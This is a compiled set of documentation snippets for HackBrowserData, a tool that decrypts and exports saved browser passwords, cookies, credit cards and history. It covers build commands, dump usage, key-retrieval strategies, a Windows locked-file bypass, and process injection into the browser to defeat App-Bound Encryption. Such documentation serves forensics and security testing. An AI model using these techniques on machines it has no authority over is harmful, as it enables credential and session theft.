### Build HackBrowserData from Source Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Clone the repository and build the command-line tool using Go. Ensure you have Go 1.20+ installed. ```bash git clone https://github.com/moonD4rk/HackBrowserData cd HackBrowserData go build ./cmd/hack-browser-data/ ``` -------------------------------- ### Build, Test, and Lint Go Project Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CONTRIBUTING.md Standard commands for building, testing, and linting the Go project. Ensure golangci-lint v2 is installed for linting. ```bash # Build go build ./cmd/hack-browser-data/ ``` ```bash # Test go test ./... ``` ```bash # Lint (requires golangci-lint v2) golangci-lint run ``` -------------------------------- ### Browser Selection Entry Points Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/001-project-architecture.md Illustrates the two main entry points for browser data handling: PickBrowsers for extraction and DiscoverBrowsers for listing. PickBrowsers includes decryption setup, while DiscoverBrowsers skips it. ```go PickBrowsers(opts) // used by `dump` — ready to Extract → pickFromConfigs(configs, opts) // shared discovery core → platformBrowsers() // build-tagged list for this OS → filter by name / profile path → newBrowsers(cfg) // dispatch to chromium/firefox/safari.NewBrowsers → discoverProfiles() // scan profile subdirectories → resolveSourcePaths() // stat candidates, first match wins → newPlatformInjector(opts) // build-tagged: returns a func(Browser) → for each browser: // closure captures retriever + keychain pw lazily inject(b) // type-assert retrieverSetter / keychainPasswordSetter DiscoverBrowsers(opts) // used by `list` / `list --detail` → pickFromConfigs(configs, opts) // same shared discovery core, NO injection ``` -------------------------------- ### CLI Command Example Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/007-cli-and-output-design.md This command demonstrates how to dump specific data categories (password, cookie) from Chrome browsers into CSV files within a 'results' directory. It specifies the output format and target categories. ```bash hack-browser-data dump -b chrome -c password,cookie -f csv -d results ``` -------------------------------- ### Use Custom Browser Profile Path Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Specifies a custom path to the browser's profile directory, useful for non-standard installations. ```bash hack-browser-data dump -b chrome -p "/path/to/User Data/Default" ``` -------------------------------- ### Build Chrome ABE Payload DLL Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md Build the C payload DLL for Chrome ABE integration on Windows. Requires zig, which can be installed via Homebrew. ```bash make payload ``` -------------------------------- ### Conventional Commits Examples Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CONTRIBUTING.md Examples of commit messages following the Conventional Commits specification. Use these to categorize changes like features, fixes, chores, docs, refactors, and tests. ```git feat: add support for new browser ``` ```git fix: resolve cookie decryption on Windows ``` ```git chore: update dependencies ``` ```git docs: improve RFC documentation ``` ```git refactor: simplify profile discovery logic ``` ```git test: add extraction tests for Firefox ``` -------------------------------- ### LevelDB Directory Copying Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/008-file-acquisition-and-platform-quirks.md Demonstrates how the Acquire function handles LevelDB directories by copying the entire directory while specifically skipping the LOCK file to avoid interfering with the running browser. ```go When `isDir=true`, `Acquire` copies the entire directory while **skipping the `LOCK` file**. LevelDB uses this file for single-process access control; copying it could interfere with the running browser. ``` -------------------------------- ### Acquire Flow Logic Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/008-file-acquisition-and-platform-quirks.md Illustrates the decision tree for acquiring files or directories. It shows how companion files are handled for regular files and how locked files are managed on Windows. ```go Acquire(src, dst, isDir) ├── isDir=true → copyDir(src, dst, skip="lock") │ └── isDir=false → copyFile(src, dst) ├── success → copy -wal and -shm companions if present └── failure + Windows → copyLocked(src, dst) fallback ``` -------------------------------- ### Path Matching with Short-Name Tolerance Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/009-windows-locked-file-bypass.md Demonstrates how to compare file paths while tolerating Windows 8.3 short path names by extracting and comparing a stable suffix. ```text Input: C:\Users\RUNNER~1\AppData\Local\Google\Chrome\...\Network\Cookies Suffix: google\chrome\...\network\cookies Input: C:\Users\runneradmin\AppData\Local\Google\Chrome\...\Network\Cookies Suffix: google\chrome\...\network\cookies → match! ``` -------------------------------- ### Yandex Credit Card Row Encryption Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/012-yandex-decryption.md Credit card private data is AES-GCM sealed with the row's GUID as AAD. The decrypted data is a JSON object containing sensitive card details. ```plaintext Same byte shape as passwords but AAD = the row's `guid` bytes (plus optional keyID). Decrypted plaintext is a JSON object with `full_card_number`, `pin_code`, `secret_comment`. The sibling `public_data` column is plaintext JSON with `card_holder`, `card_title`, `expire_date_month`, `expire_date_year`. ``` -------------------------------- ### Build HackBrowserData CLI Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md Build the main CLI executable. Ensure you are using Go 1.20 for module operations. ```bash go build ./cmd/hack-browser-data/ ``` -------------------------------- ### Manage Go Modules Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md Ensure Go module dependencies are tidy and verified. Crucially, use Go 1.20 to avoid bumping the Go directive version. ```bash export GOROOT=$(brew --prefix go@1.20)/libexec && export PATH=$GOROOT/bin:$PATH go mod tidy ``` ```bash go mod verify ``` -------------------------------- ### Lint Code with golangci-lint Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md Run the linter to check for code style and potential issues. Requires golangci-lint v2. ```bash golangci-lint run ``` -------------------------------- ### List Detected Browsers and Profiles Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Lists all detected browsers and their profiles on the system. ```bash hack-browser-data list ``` -------------------------------- ### Format Code with gofumpt and goimports Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md Format Go source files. gofumpt provides stricter formatting than gofmt. goimports updates imports and formats. ```bash gofumpt -l -w . ``` ```bash goimports -w -local github.com/moond4rk/hackbrowserdata . ``` -------------------------------- ### ABE Payload Build Command (Make) Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md This make command builds the ABE payload binary for Windows release. It uses zig cc to compile the C code into an amd64 binary and then embeds it into the Go executable using the `abe_embed` build tag. ```makefile make build-windows = make payload (zig cc → crypto/abe_extractor_amd64.bin) + GOOS=windows go build -tags abe_embed ``` -------------------------------- ### macOS Key Retrieval Strategies Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md Illustrates the different methods for retrieving encryption keys on macOS, including memory dumping, keychain password access, and command-line invocation. ```text | Priority | Strategy | Requires | Interactive? | |----------|----------|----------|:------------:| | 1 | Gcoredump (CVE-2025-2024) | Root | No | | 2 | Keychain password | `--keychain-pw` flag | No | | 3 | `security` CLI command | Nothing | Yes (dialog) | ``` -------------------------------- ### Data Flow Diagram Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/007-cli-and-output-design.md This diagram illustrates the sequence of operations for the 'dump' command, from parsing CLI arguments to writing and potentially compressing the output data. ```text CLI: hack-browser-data dump -b chrome -c password,cookie -f csv -d results → PickBrowsers(name="chrome") → []Browser → parseCategories("password,cookie") → []Category → NewWriter("results", "csv") → *Writer → for each browser: Extract(categories) → *BrowserData Writer.Add(browser, profile, data) → Writer.Write() → aggregate by category → format rows → write files → (optional) CompressDir → results.zip ``` -------------------------------- ### List Browsers with Per-Category Counts Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Lists detected browsers and profiles, including detailed counts for each data category. ```bash hack-browser-data list --detail ``` -------------------------------- ### List Browsers and Profiles Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Lists detected browsers and their profiles. ```APIDOC ## list - List detected browsers and profiles ### Parameters #### Flags - `--detail` (boolean) - Show per-category entry counts (default `false`) ### Request Example ```bash hack-browser-data list hack-browser-data list --detail ``` ``` -------------------------------- ### Run Tests for HackBrowserData Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md Execute all tests in the project. Use the verbose flag for detailed output and coverage mode to generate a coverage profile. ```bash go test ./... ``` ```bash go test -v ./... -covermode=count -coverprofile=coverage.out ``` -------------------------------- ### Download Entry Keys Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md Lists the relevant keys found in Safari's Downloads.plist for each download entry, including URL, local path, and bytes received. ```markdown | Key | Meaning | |---|---| | `DownloadEntryURL` | Source URL | | `DownloadEntryPath` | Local filesystem path | | `DownloadEntryBytesReceivedSoFar` | Bytes downloaded | | `DownloadEntryProfileUUIDStringKey` | Owning profile's uppercase UUID, or `"DefaultProfile"` | ``` -------------------------------- ### Windows Key Retrieval Flow Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md Illustrates the process of extracting the encrypted key from Local State and its subsequent decryption via DPAPI. ```text Local State → os_crypt.encrypted_key (base64 string) | "DPAPI" prefix | DPAPI-encrypted AES key | |----------------|--------------------------| | 5B (ASCII) | remaining bytes | → strip prefix → CryptUnprotectData (Crypt32.dll) → 32-byte AES-256 master key ``` -------------------------------- ### Native Payload Injection into Browser Process Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md Details the steps for injecting a native payload into a suspended browser process. This includes allocating memory, writing the patched payload, and resuming the thread to execute the payload. ```go CreateProcessW(browser.exe, CREATE_SUSPENDED) VirtualAllocEx(target, RWX, sizeOf(payload)) WriteProcessMemory(patched bytes) ResumeThread(mainThread) + Sleep(500ms) // let ntdll finish loader init CreateRemoteThread(target, remoteBase + bootstrapFileOffset) ``` -------------------------------- ### Cross-Compile HackBrowserData Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md Cross-compile the CLI for different operating systems and architectures. Requires Go 1.20. ```bash GOOS=windows GOARCH=amd64 go build ./cmd/hack-browser-data/ ``` ```bash GOOS=linux GOARCH=amd64 go build ./cmd/hack-browser-data/ ``` -------------------------------- ### Cross-platform Build for HackBrowserData Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Compile the HackBrowserData tool for different operating systems and architectures using Go's cross-compilation features. ```bash # For Windows (standard build, no Chromium 127+ ABE cookie support) GOOS=windows GOARCH=amd64 go build ./cmd/hack-browser-data/ # For Linux GOOS=linux GOARCH=amd64 go build ./cmd/hack-browser-data/ ``` -------------------------------- ### Dual-Tier Key Retrievers on Windows Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md Shows the mapping of key retriever slots to their respective sources and encryption mechanisms on Windows. ```text | Slot | Retriever | Source field | Mechanism | |------|-----------|--------------|-----------| | V10 | `DPAPIRetriever` | `os_crypt.encrypted_key` | `CryptUnprotectData` (Crypt32.dll) | | V20 | `ABERetriever` | `os_crypt.app_bound_encrypted_key` | IElevator via reflective injection (see [RFC-010](010-chrome-abe-integration.md)) | ``` -------------------------------- ### Format Go Code Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CONTRIBUTING.md Commands to format Go code using gofumpt and goimports. The goimports command is configured to handle local imports. ```bash # Format gofumpt -l -w . goimports -w -local github.com/moond4rk/hackbrowserdata . ``` -------------------------------- ### Windows Locked File Bypass Solution Overview Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/009-windows-locked-file-bypass.md Outlines the steps to bypass Windows exclusive file locks using kernel APIs: finding Chrome's handle, duplicating it, and reading via memory-mapped I/O. ```text NtQuerySystemInformation → find Chrome's handle to Cookies file → DuplicateHandle into our process → CreateFileMappingW + MapViewOfFile (read from kernel cache) → write bytes to temp destination ``` -------------------------------- ### ABE Retriever Integration in Go Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md Shows how the ABE Retriever is integrated into the key retrieval chain in the Go process. It reads the Local State file, extracts the APPB-prefixed blob, and resolves the browser executable path. ```go browser/chromium.Extract() → keyretriever.Chain [ABERetriever, DPAPIRetriever] → ABERetriever.RetrieveKey(): reads Local State → extracts APPB-prefixed blob resolves browser exe via registry App Paths → utils/injector.Reflective.Inject(exePath, payload, env) ``` -------------------------------- ### CompressDir Utility Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/008-file-acquisition-and-platform-quirks.md Describes the CompressDir utility, which archives all files in a specified directory into a single zip file and then removes the original files. ```go CompressDir compresses all files in the output directory into a single `.zip` file (used by `--zip` flag). Original files are removed after archiving. ``` -------------------------------- ### Display HackBrowserData Help Information Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Shows the main help message for hack-browser-data, outlining available commands and global flags. ```bash hack-browser-data -h ``` -------------------------------- ### Extract() Orchestration Flow Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/001-project-architecture.md Details the common extraction pattern for Chromium and Firefox engines, including session creation, file acquisition, master key retrieval, category extraction, and temporary directory cleanup. ```go Extract(categories) 1. NewSession() → create isolated temp directory 2. acquireFiles(session) → copy source files to temp dir (with dedup and WAL/SHM) 3. getMasterKey(session) → platform-specific key retrieval 4. for each category: extractCategory(data, cat, masterKey, path) 5. defer session.Cleanup() → remove temp directory ``` -------------------------------- ### ABE Retriever Default Configuration (Go) Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md This Go code shows the default retriever configuration on Windows, which includes both V10 (DPAPI) and V20 (ABE) retrievers. They are wired independently to handle profiles with mixed ciphertext versions. ```go keyretriever.DefaultRetrievers() on Windows returns a Retrievers struct with V10 = &DPAPIRetriever{} and V20 = &ABERetriever{} ``` -------------------------------- ### Linux PBKDF2 Parameters Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/003-chromium-encryption.md Lists the PBKDF2 parameters used for key derivation in Linux Chromium encryption (v10 and v11). ```plaintext | Parameter | Value | |-----------|-------| | Hash | SHA-1 | | Salt | `saltysalt` | | Iterations | 1 | | Key length | 16 bytes (AES-128) | ``` -------------------------------- ### LocalStorage Nested SQLite Structure Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md Details the directory structure for Safari 17+ localStorage, showing the partition-aware nested tree leading to localstorage.sqlite3 databases. ```markdown `/// ├── origin ← binary-serialized origins (top + frame) └── LocalStorage/ ├── localstorage.sqlite3 ← ItemTable(key TEXT UNIQUE, value BLOB NOT NULL) ├── localstorage.sqlite3-shm └── localstorage.sqlite3-wal ``` -------------------------------- ### Print HackBrowserData Version Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Prints the current version of the hack-browser-data tool. ```bash hack-browser-data version ``` -------------------------------- ### Windows Build with App-Bound Encryption Support Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Build HackBrowserData for Windows with support for decrypting cookies from newer Chromium versions (127+) that use App-Bound Encryption. This requires Zig (0.13+) or MinGW-w64 gcc. ```bash # 1. Install Zig brew install zig # macOS scoop install zig # Windows (scoop) ``` -------------------------------- ### LocalStorage Root Paths by Profile Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md Indicates the root directory paths for localStorage data based on the Safari profile (Default or Named). ```markdown | Profile | Root path | |-----------|-----------| | Default | `Container/WebKit/WebsiteData/Default/` | | Named | `Container/WebKit/WebsiteDataStore//Origins/` | ``` -------------------------------- ### Query Firefox LocalStorage Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/004-firefox-data-storage.md Retrieve LocalStorage data from Firefox's webappsstore.sqlite. The 'originKey' column uses a reversed-host format. ```sql SELECT originKey, key, value FROM webappsstore2 ``` -------------------------------- ### Time-Shared Scratch Region Usage Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md Explains the time-sharing mechanism of the scratch region at `0x40..0x5F`. Go writes import pointers before injection, the Bootstrap process reads them once, and DllMain overwrites them with the master key. ```plaintext 0x40..0x5F is **time-shared**: Go writes import pointers pre-injection; Bootstrap reads them once at function start; then DllMain overwrites the same bytes with the key. No concurrent readers. ``` -------------------------------- ### KeyRetriever Interface Definition Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md Defines the Hints struct used by KeyRetrievers to specify platform-specific information. Callers populate Hints from BrowserConfig. ```go type Hints struct { KeychainLabel string // macOS Keychain account / Linux D-Bus Secret Service item label (e.g. "Chrome", "Chrome Safe Storage") WindowsABEKey string // Windows ABE browser key used by ABERetriever to locate the elevation-service COM interface (e.g. "chrome", "edge"). "" → ABE not applicable; ABERetriever returns (nil, nil) silently. LocalStatePath string // path to Local State JSON. Only used on Windows (DPAPI + ABE both read it). } ``` -------------------------------- ### Query Downloads from History SQLite Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/002-chromium-data-storage.md SQL query to retrieve download information such as target path, source URL, file size, and timestamps from the 'downloads' table. Shares the 'History' database. ```sql SELECT target_path, tab_url, total_bytes, start_time, end_time, mime_type FROM downloads ``` -------------------------------- ### Bootstrap Scratch Layout Assertions (C) Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md These C static assertions ensure the layout of the BootstrapScratch struct in memory matches the expected offsets for communication between the Go injector and the C payload. They are used with `go tool cgo -godefs` to generate Go constants. ```c _Static_assert(offsetof(struct BootstrapScratch, marker) == 0x28, "marker offset"); _Static_assert(offsetof(struct BootstrapScratch, hresult) == 0x2C, "hresult offset"); _Static_assert(offsetof(struct BootstrapScratch, shared) == 0x40, "shared offset"); ``` -------------------------------- ### Query Firefox Downloads Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/004-firefox-data-storage.md Extract download metadata from Firefox's places.sqlite by joining moz_annos and moz_places tables. Download information is stored as a concatenated string. ```sql SELECT place_id, GROUP_CONCAT(content), url, dateAdded FROM (SELECT * FROM moz_annos INNER JOIN moz_places ON moz_annos.place_id = moz_places.id) t GROUP BY place_id ``` -------------------------------- ### C Payload Build Configuration Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md Specifies the build toolchain and target architecture for the native C payload. It emphasizes the use of 'zig cc' for cross-compilation and the x86_64 architecture. ```c Built with `zig cc -target x86_64-windows-gnu`. ``` -------------------------------- ### BinaryCookies High-Level Layout Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md Illustrates the structure of Apple's proprietary BinaryCookies format, showing the magic number, page count, page sizes, and variable-sized pages. ```markdown | "cook" magic | page_count | page_sizes[] | pages[] | |--------------|------------|------------------|--------------------------| | 4B | 4B (BE) | page_count × 4B | variable | ``` -------------------------------- ### Compress Output to Zip Archive Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Compresses the exported browser data into a zip archive. ```bash hack-browser-data dump --zip ``` -------------------------------- ### Firefox privateKeyPBE Key Derivation Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/005-firefox-encryption.md Explains the NSS PBE-SHA1-3DES derivation process for master keys, including the calculation of intermediate values and the final key and IV. ```plaintext hp = SHA1(globalSalt) c k = SHA1(hp || entrySalt) k1 = HMAC-SHA1(ck, pad(entrySalt,20) || entrySalt) k2 = HMAC-SHA1(ck, HMAC-SHA1(ck, pad(entrySalt,20)) || entrySalt) dk = k1 || k2 // 40 bytes key = dk[:24], iv = dk[32:40] // 3DES key + IV ``` -------------------------------- ### Directory Structure of HackBrowserData Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/001-project-architecture.md Illustrates the organizational structure of the HackBrowserData project, detailing the purpose of each top-level directory and its subdirectories. ```tree HackBrowserData/ ├── cmd/hack-browser-data/ # CLI entrypoint: cobra root, dump, list, version ├── browser/ # Browser interface, PickBrowsers(), platform browser lists │ ├── chromium/ # Chromium engine: extraction, decryption, profile discovery │ └── firefox/ # Firefox engine: extraction, NSS key derivation ├── types/ # Data model: Category enum, Entry structs, BrowserData ├── crypto/ # Encryption primitives, cipher version detection │ └── keyretriever/ # Platform-specific master key retrieval (Keychain/DPAPI/D-Bus) ├── filemanager/ # Temp file session, locked file handling (Windows) ├── output/ # Output Writer: CSV, JSON, CookieEditor formatters ├── log/ # Logging with level filtering └── utils/ # SQLite query helpers, file utilities ``` -------------------------------- ### macOS PBKDF2 Key Derivation Parameters Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/006-key-retrieval-mechanisms.md Specifies the parameters used for deriving the AES-128 key from a raw password string on macOS via PBKDF2. ```text | Parameter | Value | Source | |-----------|-------|--------| | Salt | `"saltysalt"` | [os_crypt_mac.mm](https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157) | | Iterations | 1003 | | | Key length | 16 bytes (AES-128) | | | Hash | HMAC-SHA1 | | ``` -------------------------------- ### Export Browser Data in JSON Format Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Exports browser data in JSON format to a specified output directory. Useful for machine-readable output. ```bash hack-browser-data dump -b chrome -f json -d output ``` -------------------------------- ### Print Version Information Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Prints the version information of the hack-browser-data tool. ```APIDOC ## version - Print version information ### Request Example ```bash hack-browser-data version ``` ``` -------------------------------- ### Reading Locked Files via Memory-Mapped I/O Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/009-windows-locked-file-bypass.md Details the process of reading a locked file using memory-mapped I/O, which accesses the OS kernel's file cache for a more complete snapshot. ```text | DuplicateHandle (read access) | |-------------------------------------------------| ↓ | CreateFileMappingW(handle, PAGE_READONLY) | |-------------------------------------------------| ↓ | MapViewOfFile(mapping, FILE_MAP_READ, fileSize) | |-------------------------------------------------| ↓ | byte slice from kernel file cache | | (includes uncommitted WAL data from Chrome) | |-------------------------------------------------| ↓ | os.WriteFile(destination, bytes, 0600) | |-------------------------------------------------| ``` -------------------------------- ### Extract Safari History Items and Visits Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/011-safari-data-storage.md This SQL query selects URLs, titles, visit counts, and visit times from Safari's history. It joins the history_items and history_visits tables, prioritizing the most recent visit for each item and sorting results by visit count in descending order. The visit_time uses the Core Data epoch. ```sql SELECT url, title, visit_count, visit_time FROM history_items LEFT JOIN history_visits ON history_items.id = history_visits.history_item ``` -------------------------------- ### Export Cookies in CookieEditor Format Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Exports cookies in a format compatible with the Cookie Editor browser extension. ```bash hack-browser-data dump -f cookie-editor ``` -------------------------------- ### Check for Typos Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CONTRIBUTING.md Command to perform a spelling check on the project files using the 'typos' tool. ```bash # Spelling check typos ``` -------------------------------- ### Query URLs from History SQLite Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/002-chromium-data-storage.md SQL query to fetch browsing history data including URL, title, visit count, and last visit time from the 'urls' table. Results are sorted by visit count. ```sql SELECT url, title, visit_count, last_visit_time FROM urls ``` -------------------------------- ### Firefox Login Decryption Pipeline Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/005-firefox-encryption.md Visualizes the step-by-step process for decrypting Firefox login credentials, from base64 encoded string to plaintext. ```text logins.json → encryptedUsername / encryptedPassword (base64 string) | base64 encoded string | |----------------------------------------------------------| ↓ base64 decode | raw ASN1 DER bytes | |----------------------------------------------------------| ↓ ASN1 parse (auto-detect credentialPBE) | IV (8B or 16B) | ciphertext | |----------------------------------------------------------| ↓ decrypt (3DES or AES-256 based on IV length) | plaintext + PKCS5 padding | |----------------------------------------------------------| ↓ strip PKCS5 padding | plaintext (UTF-8 string) | |----------------------------------------------------------| ``` -------------------------------- ### Global Flags Source: https://github.com/moond4rk/hackbrowserdata/blob/main/README.md Flags that can be used with any command. ```APIDOC ### Global flags | Flag | Short | Description | |-------------|-------|----------------------| | `--verbose` | `-v` | Enable debug logging | ### Request Example ```bash hack-browser-data -v dump ``` ``` -------------------------------- ### Regenerate Go Layout Constants Source: https://github.com/moond4rk/hackbrowserdata/blob/main/CLAUDE.md Update Go layout constants from the C bootstrap_layout.h file. This is part of the Chrome ABE payload generation process. ```bash make gen-layout ``` -------------------------------- ### Firefox journal_mode=off Configuration Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/008-file-acquisition-and-platform-quirks.md Explains the use of `journal_mode=off` for Firefox extract calls to prevent potential WAL replay issues with the modernc.org/sqlite driver on temporary copies. ```go All Firefox extract calls use `journal_mode=off`. Firefox databases use WAL mode in production, and the `modernc.org/sqlite` driver may attempt WAL replay on a temp copy. Disabling the journal prevents this and treats the database as a read-only snapshot. ``` -------------------------------- ### Remote Payload Execution and COM RPC Call Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/010-chrome-abe-integration.md Illustrates the execution flow within the remote browser process. The injected payload's Bootstrap function calls DllMain, which then initiates the COM RPC to decrypt data using the elevation service. ```c Bootstrap → see §4.1 (7 helpers + orchestrator) ↓ calls DllMain(DLL_PROCESS_ATTACH, imageBase) DoExtractKey → see §4.2 CoCreateInstance(CLSID, IID_v2 | fallback IID_v1) CoSetProxyBlanket(PKT_PRIVACY + IMPERSONATE) vtbl[slot]->DecryptData(bstrEnc) ↓ COM RPC elevation_service (SYSTEM) → returns 32-byte plaintext key publish_key() → imageBase[0x40..0x5F] (success) publish_error(code, hr, comErr) (failure) ``` -------------------------------- ### macOS PBKDF2 Parameters Source: https://github.com/moond4rk/hackbrowserdata/blob/main/rfcs/003-chromium-encryption.md Specifies the PBKDF2 parameters used for key derivation in macOS Chromium encryption. ```plaintext | Parameter | Value | |-----------|-------| | Hash | SHA-1 | | Salt | `saltysalt` | | Iterations | 1003 | | Key length | 16 bytes (AES-128) | ```